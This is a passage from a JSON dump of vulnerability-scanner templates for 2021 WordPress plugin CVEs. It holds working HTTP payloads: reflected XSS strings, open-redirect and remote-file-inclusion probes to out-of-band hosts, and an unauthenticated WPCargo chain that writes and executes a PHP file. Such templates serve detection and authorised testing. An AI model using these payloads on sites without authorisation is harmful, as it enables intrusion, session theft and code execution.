7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the WordPress Super Socializer plugin (7.13.30 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24987\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24987\n cwe-id: CWE-79\n epss-score: 0.00086\n epss-percentile: 0.35299\n cpe: cpe:2.3:a:heateor:super_socializer:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: heateor\n product: super_socializer\n framework: wordpress\n tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"facebook_urls\":[[\"\"]]'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022072d7507fe3f98f145bb0366d01ee315c4090c40e04ea184f4563ab190e401a7e022100c4dacb7acbb47c6a77145ea140e5e68f4bfb3a15cbbfca8f3fe70afdc48dbbb7:922c64590222798bb761d5b6d8e72950", "hash": "cb0a5af6a5ed4a1c5ef2472bdd982b93", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e3" }, "name": "CVE-2021-24991.yaml", "content": "id: CVE-2021-24991\n\ninfo:\n name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.\n impact: |\n An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24991\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2021-24991\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.28508\n cpe: cpe:2.3:a:wpovernight:woocommerce_pdf_invoices\\&_packing_slips:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wpovernight\n product: woocommerce_pdf_invoices\\&_packing_slips\n framework: wordpress\n tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan,wpovernight\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\" style=animation-name:rotation onanimationstart=alert(document.domain) x\"\n - \"WooCommerce PDF Invoices\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e3fab7e5665c508ed27c90a825ed1b062c712e2975095070c7bfa0db637630ac02201db7375a05fb52ce17611603b42d4dd1518cba8f7f15dc2bbb3988dd43a56062:922c64590222798bb761d5b6d8e72950", "hash": "f021ddc811746160d6b75c1792f0f66c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e4" }, "name": "CVE-2021-24997.yaml", "content": "id: CVE-2021-24997\n\ninfo:\n name: WordPress Guppy <=1.1 - Information Disclosure\n author: Evan Rubinstein\n severity: medium\n description: WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: |\n Update to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50540\n - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability\n - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24997\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-24997\n cwe-id: CWE-862\n epss-score: 0.0019\n epss-percentile: 0.55517\n cpe: cpe:2.3:a:wp-guppy:wp_guppy:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wp-guppy\n product: wp_guppy\n framework: wordpress\n tags: cve,cve2021,wordpress,guppy,api,wp-plugin,edb,wpscan,wp-guppy\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"guppyUsers\":'\n - '\"userId\":'\n - '\"type\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009940ed970e2fe98caebdb9000bae9afc4290524e778cb754f7a1bbab62a0cca5022100d07f577257ea8cd109f810bd9f0cbbe6a15f7c41569e27c4b31bec75455d0ce0:922c64590222798bb761d5b6d8e72950", "hash": "cb1b34773095cdccbb6ce2b2419aa588", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e5" }, "name": "CVE-2021-25003.yaml", "content": "id: CVE-2021-25003\n\ninfo:\n name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution\n author: theamanrawat\n severity: critical\n description: |\n WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n remediation: |\n Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a\n - https://wordpress.org/plugins/wpcargo/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25003\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-25003\n cwe-id: CWE-434,CWE-94\n epss-score: 0.61252\n epss-percentile: 0.97725\n cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\\&_trace:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wptaskforce\n product: wpcargo_track_\\&_trace\n framework: wordpress\n tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 2={{md5(num)}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_1 != 200\n - status_code_2 == 200\n - status_code_3 == 200\n - contains(body_3, md5(num))\n - contains(body_3, 'PNG')\n condition: and\n# digest: 4a0a00473045022100b5707ad91e6b1dfa5b4a3bc474d4742991a1d184ae0613aa6cb97d286b6dfc10022037152a98a4212c570ce5b27a05074e2caeefd10b0e48b23218d1d6956512453e:922c64590222798bb761d5b6d8e72950", "hash": "43b1f8f4b0f952775b7a3f50e8dc63f1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e6" }, "name": "CVE-2021-25008.yaml", "content": "id: CVE-2021-25008\n\ninfo:\n name: The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25008\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25008\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:codesnippets:code_snippets:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: codesnippets\n product: code_snippets\n framework: wordpress\n tags: cve,cve2021,authenticated,wpscan,xss,wp,wordpress,wp-plugin,codesnippets\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\\\" style=animation-name:rotation onanimationstart=alert(document.domain) x\"\n - \"Snippets\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210080481e6e1ba1c67c11351890a405747b0082be4ba5d44bf5837a927a64705902022023a138df22ac6f0201daaf4656cb1c2ce449367c4251627cbf62327376b74bc5:922c64590222798bb761d5b6d8e72950", "hash": "5be4ca69451978c20574e5dd4b0a50bd", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e7" }, "name": "CVE-2021-25016.yaml", "content": "id: CVE-2021-25016\n\ninfo:\n name: Chaty < 2.8.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.\n remediation: Fixed in 2.8.3\n reference:\n - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25016\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25016\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: premio\n product: chaty\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/chaty/\"\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"search=\"\n - \"chaty_page_chaty\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200562d68182e1f0832f719f7ffcc7031dd943c79e8086641c3bf82c70789eb8f30220539f7c805bba5467372c8534f30dd6565b0ad9886177350366dca637604e7708:922c64590222798bb761d5b6d8e72950", "hash": "0faf725923d17a86a6fffe3c47b0e7b8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e8" }, "name": "CVE-2021-25028.yaml", "content": "id: CVE-2021-25028\n\ninfo:\n name: WordPress Event Tickets < 5.2.2 - Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress Event Tickets < 5.2.2 is susceptible to an open redirect vulnerability. The plugin does not validate the tribe_tickets_redirect_to parameter before redirecting the user to the given value, leading to an arbitrary redirect issue.\n remediation: |\n Update to the latest version of the WordPress Event Tickets plugin (5.2.2 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/80b0682e-2c3b-441b-9628-6462368e5fc7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25028\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25028\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42838\n cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tri\n product: event_tickets\n framework: wordpress\n tags: cve2021,cve,wordpress,redirect,wp-plugin,eventtickets,wpscan,tri\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a004730450220523e42cccb15d399bfe1d8f4b00af72f0ccf7c7bd749ec772e31fa77690724b4022100bfbc6f0237c977b76922435c5442ce93f373946c65ea39d0dcb51f48c357a6d1:922c64590222798bb761d5b6d8e72950", "hash": "10bc89ad01e1948c825e80e53c2241df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e9" }, "name": "CVE-2021-25033.yaml", "content": "id: CVE-2021-25033\n\ninfo:\n name: Noptin < 1.6.5 - Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the \"to\" parameter before redirecting the user to its given value, leading to an open redirect issue.\n impact: |\n An attacker can trick users into visiting malicious websites, leading to phishing attacks.\n remediation: |\n Update to Noptin plugin version 1.6.5 or later.\n reference:\n - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c\n - https://plugins.trac.wordpress.org/changeset/2639592\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25033\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25033\n cwe-id: CWE-601\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: noptin\n product: noptin\n framework: wordpress\n tags: cve2021,cve,wp,wpscan,wordpress,redirect,wp-plugin,noptin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022012084f97047c7ac54d9935c917e356d3e8cc4cf7d1eb64fe16de01ea652b7ca9022100e2abc8461b032fe559fe1bd613aada42533b08c6dc4a843581c08b25e83f2b25:922c64590222798bb761d5b6d8e72950", "hash": "cdfbb52d74c476f670c6cf2f928de1d6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ea" }, "name": "CVE-2021-25052.yaml", "content": "id: CVE-2021-25052\n\ninfo:\n name: WordPress Button Generator <2.3.3 - Remote File Inclusion\n author: cckuailong\n severity: high\n description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.\n impact: |\n An attacker can exploit this vulnerability to execute arbitrary code on the target system.\n remediation: |\n Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability.\n reference:\n - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25052\n - https://plugins.trac.wordpress.org/changeset/2641639/button-generation\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-25052\n cwe-id: CWE-352\n epss-score: 0.01998\n epss-percentile: 0.88568\n cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wow-company\n product: button_generator\n framework: wordpress\n tags: cve2021,cve,wp-plugin,authenticated,wpscan,rfi,wp,wordpress,wow-company\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n name: \"http\"\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205262ea4dab221e3963ad7f92b32d9b9dad85dfa63eb43144b4d17fb5dfd2371a0220423122b10f03da727e631455d4cd3c7d6adc8f94bd6bf9e89525bf11bdfa97b1:922c64590222798bb761d5b6d8e72950", "hash": "21d5b52fb053ed4d3349a321d81400ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082eb" }, "name": "CVE-2021-25055.yaml", "content": "id: CVE-2021-25055\n\ninfo:\n name: WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: |\n The plugin is affected by a cross-site scripting vulnerability within the \"visibility\" parameter.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.\n remediation: |\n Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055\n - https://plugins.trac.wordpress.org/changeset/2662665\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25055\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: feedwordpress_project\n product: feedwordpress\n framework: wordpress\n tags: cve2021,cve,wordpress,xss,wp-plugin,authenticated,wpscan,feedwordpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e300910d515c6736720a43f88bd07fb9e8fe55dfb9476cd2cbcc4c09c1296d6a022100bcc84f726d27a269aa1bc67d9b8f62a6107064085fc4a8f16be9d7a11ae4db38:922c64590222798bb761d5b6d8e72950", "hash": "abc668ece4e203aae380c2c43fb7499b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ec" }, "name": "CVE-2021-25063.yaml", "content": "id: CVE-2021-25063\n\ninfo:\n name: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch.\n reference:\n - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25063\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25063\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42838\n cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: cf7skins\n product: contact_form_7_skins\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"' type='hidden\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220638af89697796455e81da94a0b565bf04d1772c49363f630e14a8c366cf52334022100d961ae7ead36d711dd2c4b09d124180e8f7e9b14143961e41b8f770f612ec21f:922c64590222798bb761d5b6d8e72950", "hash": "1c73b1b830098f47543f067a3f79cb07", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ed" }, "name": "CVE-2021-25065.yaml", "content": "id: CVE-2021-25065\n\ninfo:\n name: Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.\n impact: |\n An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 2.19.2\n reference:\n - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc\n - https://wordpress.org/plugins/custom-facebook-feed/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-25065\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.2831\n cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: smashballoon\n product: smash_balloon_social_post_feed\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/custom-facebook-feed/\"\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"custom-facebook-feed\")'\n condition: and\n# digest: 490a00463044022066171bc49b581bbbebf6e9bec3caae6f91de6cce6ace3ec1704214aab994b6000220419bff836a9ea9a7f671fe1105bc2f9f544d5b7cf562d3934255061ebaeb8388:922c64590222798bb761d5b6d8e72950", "hash": "bbdae920fb97c4ec3bcade78ba5babac", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ee" }, "name": "CVE-2021-25067.yaml", "content": "id: CVE-2021-25067\n\ninfo:\n name: Landing Page Builder < 1.4.9.6 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: Fixed in version 1.4.9.6.\n reference:\n - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc\n - https://wordpress.org/plugins/page-builder-add/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25067\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-25067\n cwe-id: CWE-79\n epss-score: 0.00069\n epss-percentile: 0.285\n cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: pluginops\n product: landing_page\n framework: wordpress\n tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?post_type=ulpb_post&page=page-builder-new-landing-page&thisPostID=test\"+style=animation-name:rotation+onanimationstart=alert(document.domain)+x= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"test\\\\\\\" style=animation-name:rotation onanimationstart=alert(document.domain)\")'\n - 'contains(body_2, \"Enter Page Title\")'\n condition: and\n# digest: 4a0a00473045022100c83a8800b7738a60c2e6679d08ac8364a83b01e70927c405a8c6a5ab61c297a0022063a98761a2006bab30e128e42f3f9407f213005d4b390a7faf7027e103f4cf29:922c64590222798bb761d5b6d8e72950", "hash": "5345d1c3049d76f6703b301b5c074db7", "level": 4, 